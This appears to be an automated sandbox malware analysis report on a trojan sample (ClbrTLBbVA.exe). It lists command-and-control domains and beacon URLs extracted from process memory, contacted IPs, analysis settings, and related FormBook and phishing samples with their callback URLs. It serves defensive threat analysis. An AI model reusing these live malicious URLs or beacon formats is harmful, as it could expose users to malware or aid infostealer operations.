          http://www.zijlont.xyz/ne28/www.adornmentwithadrienne.com0%Avira URL Cloudsafe
          http://www.zijlont.xyz0%Avira URL Cloudsafe
          http://www.geseconevent.com0%Avira URL Cloudsafe
          http://www.adornmentwithadrienne.com/ne28/0%Avira URL Cloudsafe
          http://www.groupetalentapro.com/ne28/www.poshcompanyandsuites.net0%Avira URL Cloudsafe
          https://www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg0%Avira URL Cloudsafe
          www.theredorchard.co.uk/ne28/0%Avira URL Cloudsafe
          http://www.poshcompanyandsuites.netReferer:0%Avira URL Cloudsafe
          http://www.greengrovetherapy.com0%Avira URL Cloudsafe
          http://www.6pg.shop/ne28/0%Avira URL Cloudsafe
          http://www.11600yy.com/ne28/0%Avira URL Cloudsafe
          http://www.poshcompanyandsuites.net/ne28/www.hatchandneststudio.com0%Avira URL Cloudsafe
          http://www.dafabetvn.info0%Avira URL Cloudsafe
          http://www.adornmentwithadrienne.comReferer:0%Avira URL Cloudsafe
          http://www.greengrovetherapy.com/ne28/0%Avira URL Cloudsafe
          http://www.forum-sanmonika.online0%Avira URL Cloudsafe
          http://www.listestubenring.comReferer:0%Avira URL Cloudsafe
          http://www.conviord.com/ne28/www.fren.pet0%Avira URL Cloudsafe
          http://www.poshcompanyandsuites.net/ne28/0%Avira URL Cloudsafe
          http://www.11600yy.com0%Avira URL Cloudsafe
          http://www.geseconevent.com/ne28/0%Avira URL Cloudsafe
          http://www.adornmentwithadrienne.com0%Avira URL Cloudsafe
          http://www.conviord.comReferer:0%Avira URL Cloudsafe
          http://www.dafabetvn.info/ne28/0%Avira URL Cloudsafe
          http://www.listestubenring.com0%Avira URL Cloudsafe
          http://www.labishu.comReferer:0%Avira URL Cloudsafe
          http://www.fren.pet/ne28/0%Avira URL Cloudsafe
          http://www.11600yy.comReferer:0%Avira URL Cloudsafe
          http://www.forum-sanmonika.online/ne28/www.11600yy.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          dafabetvn.info
          		15.197.142.173
          		truetrue
            		unknown
            adornmentwithadrienne.com
            		66.235.200.145
            		truetrueunknown
            www.adornmentwithadrienne.com
            		unknown
            		unknowntrue
              		unknown
              www.dafabetvn.info
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.theredorchard.co.uk/ne28/true
                • Avira URL Cloud: safe
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.fren.petReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.fontbureau.com/designersGClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.6pg.shopReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.groupetalentapro.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.6pg.shopexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designers/?ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.forum-sanmonika.onlineReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.founder.com.cn/cn/bTheClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.dafabetvn.infoReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.11600yy.com/ne28/www.greengrovetherapy.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fren.petexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designers?ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.groupetalentapro.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.conviord.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.geseconevent.com/ne28/www.forum-sanmonika.onlineexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.greengrovetherapy.com/ne28/www.listestubenring.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tiro.comClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/RentalPropertyDataSet.xsdClbrTLBbVA.exefalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com/designersClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.labishu.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.labishu.com/ne28/www.geseconevent.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.goodfont.co.krClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.6pg.shop/ne28/www.labishu.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.forum-sanmonika.online/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.groupetalentapro.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sajatypeworks.comClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cn/cTheClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fren.pet/ne28/www.groupetalentapro.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.galapagosdesign.com/staff/dennis.htmClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://fontfabrik.comClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.listestubenring.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.conviord.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.geseconevent.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.hatchandneststudio.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.dafabetvn.info/ne28/www.6pg.shopexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.poshcompanyandsuites.netexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.galapagosdesign.com/DPleaseClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.theredorchard.co.ukReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.zijlont.xyz/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.theredorchard.co.uk/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fonts.comClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.sandoll.co.krClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.urwpp.deDPleaseClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.listestubenring.com/ne28/www.conviord.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.zhongyicts.com.cnClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.zijlont.xyzReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.greengrovetherapy.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameClbrTLBbVA.exe, 00000000.00000002.305424927.00000000026D1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.sakkal.comClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.adornmentwithadrienne.com/ne28/www.dafabetvn.infoexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.hatchandneststudio.com/ne28/www.theredorchard.co.ukexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.hatchandneststudio.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.theredorchard.co.ukexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.zijlont.xyz/ne28/www.adornmentwithadrienne.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.zijlont.xyzexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.labishu.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hatchandneststudio.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.geseconevent.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.adornmentwithadrienne.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.groupetalentapro.com/ne28/www.poshcompanyandsuites.netexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.adornmentwithadrienne.com/ne28/?yXB=JRhSHgcolorcpl.exe, 0000000D.00000002.531041015.000000000505F000.00000004.10000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.greengrovetherapy.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.poshcompanyandsuites.netReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.dafabetvn.infoexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.11600yy.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.poshcompanyandsuites.net/ne28/www.hatchandneststudio.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.6pg.shop/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.adornmentwithadrienne.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.carterandcone.comlClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cnClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.greengrovetherapy.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.forum-sanmonika.onlineexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.listestubenring.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.conviord.com/ne28/www.fren.petexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.adornmentwithadrienne.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.geseconevent.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.dafabetvn.info/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designers8ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.poshcompanyandsuites.net/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.11600yy.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.conviord.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.listestubenring.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fren.pet/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.labishu.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.forum-sanmonika.online/ne28/www.11600yy.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.11600yy.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      66.235.200.145
                                      		adornmentwithadrienne.comUnited States
                                      		13335CLOUDFLARENETUStrue

                                      General Information

                                      Joe Sandbox Version:37.0.0 Beryl
                                      Analysis ID:838418
                                      Start date and time:2023-03-30 20:49:45 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 1s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:17
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample file name:ClbrTLBbVA.exe
                                      Original Sample Name:441aa97af8ab929af47af76962584b02.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@10/2@2/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 76.1% (good quality ratio 69.6%)
                                      • Quality average: 72.1%
                                      • Quality standard deviation: 31.7%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 45
                                      • Number of non-executed functions: 130
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      20:50:55API Interceptor1x Sleep call for process: ClbrTLBbVA.exe modified
                                      20:51:28API Interceptor404x Sleep call for process: explorer.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      66.235.200.145r5573XLX_Confirming_685738_Permiso.vbsGet hashmaliciousFormBookBrowse
                                      • www.shivanshnegi.com/hb6q/?kF=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==&LPW33a=EJ_Y5C3RY2AMjvtQ
                                      BBVA-Confirming_Facturas_Pagadas_al_Vencimiento.vbsGet hashmaliciousFormBookBrowse
                                      • www.shivanshnegi.com/hb6q/?3t-_2h=lQe4u&_30_T=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==
                                      GlobalImagingDocuments9575734549684.vbsGet hashmaliciousFormBookBrowse
                                      • www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb
                                      0ySMPNiDoA.exeGet hashmaliciousFormBookBrowse
                                      • www.theunstoppabletravelers.com/a19i/?4hkT=rLtsLZhSdQwFRkvaG8FjiaGEB8J9o/aSV6LeKN0wyHa1R2N5aTBKUDHw+apOLNME5B3p&aHzLRr=9rl0dna
                                      6014853.exeGet hashmaliciousFormBookBrowse
                                      • www.firepowerexpo.com/f649/?Ih3=m1lqWHCBQ/kUfIId9G1Zl7+cXxQgMOESuv3uKkpy1j9VjbvHsanxuQVfMZjTZucRw3bqX9o71XHJz8Ptxs35IAYHht5fw0SXRQ==&FTBSzg=_AtxeQJqoYkM5z7B
                                      DHL Consignment Details_pdf.exeGet hashmaliciousFormBookBrowse
                                      • www.atwatercab.com/s20g/?x8b=8pNLsfJxhBPPAD4P&d48PB=rZ/46zgpbKJOe2X3A4FYFLQg1vAXxuRWnT2LQvG1tr3ZSe4vYgV8EIvoDLg6imzOZAE7E347lg==
                                      1.exeGet hashmaliciousFormBookBrowse
                                      • www.developingdata.co.uk/jsmf/?E48=dYCiqgXuG3hVFy4ipi3itDieoHPdLKuMx6EIns39DPxXLWZ2l4orKCxGCYXf6kzaGglL4C6u2CyuHPssMtjkBh3HyQ5WL0IwEQ==&w4s=nTG8FX4X
                                      zapytanie ofertowe09356.exeGet hashmaliciousFormBookBrowse
                                      • www.sianghan.com/vweq/?iX_ll=Sv9LEx&n6CtjVk=kEv03q1ymUsS7T5lOAg/bSIihwA396N/BtF/QOyCK71sVhLsu3phc0aAw/jgZiM4T701
                                      2kYemccxJ5.exeGet hashmaliciousFormBookBrowse
                                      • www.gasgangllc.com/zgtb/?u6yHt6=XBCDKB81ZNWK6s/uuzkNoySF5lyaVown+0rckZe+lzAxbh/PfzDZwo02x7GwOXqaqmSd&AN9X=7nuP
                                      MV HARMONY STAR.exeGet hashmaliciousFormBookBrowse
                                      • www.cuttersonthemove.com/bh33/?b8=nRpjtsv9dGMjODFvv8PBqOl+WQV6kIYkn94WJMZzdKBOddTSSkk5WaiWOfXckqyNRw9/&tR-HE=EVPly4e
                                      SAO.exeGet hashmaliciousFormBookBrowse
                                      • www.dotdrugconsort.com/gfv7/?RH=rr99yo8huE5g/66Pd3jHsFjG/2+3TdEdD1qxJhEhEHZXE8sDFlsIakaAiVUDDJfopEwKRefeog==&p6d=2dxpMhQPtn88
                                      shipping documents.exeGet hashmaliciousFormBookBrowse
                                      • www.dotdrugconsort.com/gfv7/?C2MxCH=rr99yo8huE5g/66Pd3jHsFjG/2+3TdEdD1qxJhEhEHZXE8sDFlsIakaAiW4Tf4DTuxZb&w8=nR-XW
                                      DHL_Shipping Documents_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.cuttersonthemove.com/cloo/?-ZU8-t=-ZgHER&4h=8Vsp4oOYTT9URIh5rrTGBQIuyyYsyJNaKilDByrIU+o0WWwtn/eTnzBLFT1m1siy9eBE
                                      PO_05964_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.cuttersonthemove.com/cloo/?VHQtZNj=8Vsp4oOYTT9URIh5rrTGBQIuyyYsyJNaKilDByrIU+o0WWwtn/eTnzBLFT1m1siy9eBE&4hU4I=a2M4HdWh00
                                      Invoice.xlsxGet hashmaliciousFormBookBrowse
                                      • www.cuttersonthemove.com/wfc6/?AVAtZ=XDN8T76mXlOxosJFEur7mLhKdbei0l7wdtRGO3wHKcKF7/3+7zWyFQC0IosjPS9M67f6zA==&1bqp=1bl0iJ
                                      inquirt valete.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.blackeagleholdingsllc.com/bjai/?8pqLLLI=nr49rTD4f0noD60ncNBy/0C8JFsVren/6tq46Gwfuu+h8bsfnkMI8OOwpPywKu+mTNdX&GZu=-ZNTK8
                                      new inquiry.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.blackeagleholdingsllc.com/bjai/?qRlpf=nr49rTD4f0noD60ncNBy/0C8JFsVren/6tq46Gwfuu+h8bsfnkMI8OOwpPywKu+mTNdX&nTUL=8pvLmv8
                                      SecuriteInfo.com.Variant.Tedy.137414.25339.exeGet hashmaliciousFormBookBrowse
                                      • www.nothingbutdd.com/d23n/?fZLTHxQx=85hU1UZfGUnIF0coTZSIBXJgwcVw2CGuP9+/GqGWIrwThDHUcVonadWzL6RHghH9Wtpc&VhuPB=1bbpDleH3
                                      CIQ-PO16266.jsGet hashmaliciousFormBook, VjW0rmBrowse
                                      • www.muddybootslife.com/np8s/?zVB=5R3gKgAJtID3s3glssHXeRhFadAM4oJIjGTDo+g9ImvY9tNBMPSBarPOG5Bgot7e+72k&CTr8g=z48HVPSHfp
                                      CIQ-O0061624.jsGet hashmaliciousFormBook, VjW0rmBrowse
                                      • www.labsreports-menalab.com/np8s/?q6YT=2dwl4Fq&RDH4th6P=GpjSjfFBTUUsHkcv+EkKyQ5ML2mA61zAn+sP+CaupsttIwquy8NVXVMDKraU+vLcKCzA

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUShttps://www.bntouchmortgage.net/api/tracking/index.php?messageURL=https://jrparabrisas.cl/xzd/#dGhhbGxAb3AtZi5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                      • 104.16.124.175
                                      https://lobbydesires.comGet hashmaliciousUnknownBrowse
                                      • 104.19.188.97
                                      https://www.youtube.com/attribution_link?c=3Dcoachblog-ytm-acq-int-blog-txt-coach&u=http%3A%2F%2F1036604551.bikeelectric.ie%2F.memphis.edu%2F1757726375%2F8nc26%2F%2F%2F%2Frbingham@memphis.edu/?id=3Dcom.google.android.apps.youtube.musicGet hashmaliciousHTMLPhisherBrowse
                                      • 104.16.125.175
                                      DHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                      • 1.13.186.125
